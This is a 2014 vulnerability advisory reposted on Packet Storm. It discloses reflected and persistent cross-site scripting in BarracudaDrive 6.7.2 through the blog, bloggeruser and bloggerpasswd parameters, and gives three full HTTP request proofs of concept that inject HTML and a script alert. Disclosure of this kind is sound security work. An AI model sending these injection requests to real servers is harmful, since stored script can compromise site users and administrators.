what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

BarracudaDrive 6.7.2 Cross Site Scripting

BarracudaDrive 6.7.2 Cross Site Scripting
Posted May 16, 2014
Authored by Manish Tanwar

BarracudaDrive version 6.7.2 suffers from multiple reflective and persistent cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | d41472b73eb1e68306169abb69831256e5000c2d91afe4d895f79081b2bd8cb6

BarracudaDrive 6.7.2 Cross Site Scripting

Change Mirror Download
############################################################################### 
# Exploit Title : BarracudaDrive Content Management System Multiple XSS Vulnerabilities
# Author : Manish Kishan Tanwar
# Vendor : http://barracudadrive.com
# Software : BarracudaDrive 6.7.2
# Date : 15/05/2014
#Discovered At : IndiShell LAB (indishell.in aka indian cyber army)
#Love to : zero cool,Team indishell,Hardeep Singh
##############################################################################

////////////////////////////////////
// Overview of vulnerability ///
////////////////////////////////////
BarracudaDrive Multiple Reflected and Persistent Cross-site Scripting Vulnerabilities.

Reflected and Persistent Cross-Site Scripting vulnerabilities in BarracudaDrive, because it does not checking user user inputs before final processing.

1) Input passed via the "blog" parameter to "private/manage/" is not properly verified before it is givem to server for processing. This can be exploited to execute arbitrary HTML and script code.

2) Input passed via the "bloggeruser" parameter to "private/manage/" is not properly verified before it is givem to server for processing. This can be exploited to execute arbitrary HTML and script code.

3) Input passed via the "bloggerpasswd" parameter to "private/manage/" is not properly verified before it is givem to server for processing. This can be exploited to execute arbitrary HTML and script code.

///////////////////////////////
// Proof of Concept: -
///////////////////////////////

1).
http://localhost/private/manage/

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/private/manage/
Cookie: z9ZAqJtI=3176979a5371fd10
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 143

IsPublic=true&ShowLogin=on&GoogleAnalytics=&theme=BarracudaDriveb&blog=Blog"><h1>hi</h1>&msgrsskey=&bloggeruser=my_username&bloggerpasswd=my_password&fbkey=&fblink=Add+a+comment


2).
http://localhost/private/manage/

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/private/manage/
Cookie: z9ZAqJtI=3176979a5371fd10
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 143

IsPublic=true&ShowLogin=on&GoogleAnalytics=&theme=BarracudaDriveb&blog=Blog&msgrsskey=&bloggeruser=p"><marquee>hi</marquee>&bloggerpasswd=my_password&fbkey=&fblink=Add+a+comment

3).
http://localhost/private/manage/

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/private/manage/
Cookie: z9ZAqJtI=3176979a5371fd10
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 143

IsPublic=true&ShowLogin=on&GoogleAnalytics=&theme=BarracudaDriveb&blog=Blog&msgrsskey=&bloggeruser=my_username&bloggerpasswd=p"><script>alert(123);</script>&fbkey=&fblink=Add+a+comment



--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,Atul Dwivedi ethicalnoob Indishell,Local root indishell,
#Irfninja indishell,Reborn India,L0rd Crus4d3r,cool toad,cool shavik,Hackuin,Alicks,Ebin V Thomas
#Dinelson Amine,Th3 D3str0yer,SKSking,Mr. Trojan,rad paul,Godzila,mike waals,zoozoo,
#The creator,cyber warrior,Neo hacker ICA,Suriya Prakash, cyber gladiator,Cyber Ace,
#Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji ,
#Hacking queen,lovetherisk,brown suger and rest of TEAM INDISHELL
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Anju Gulia,Don(Deepika kaushik) and acche bacchi(Jagriti)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close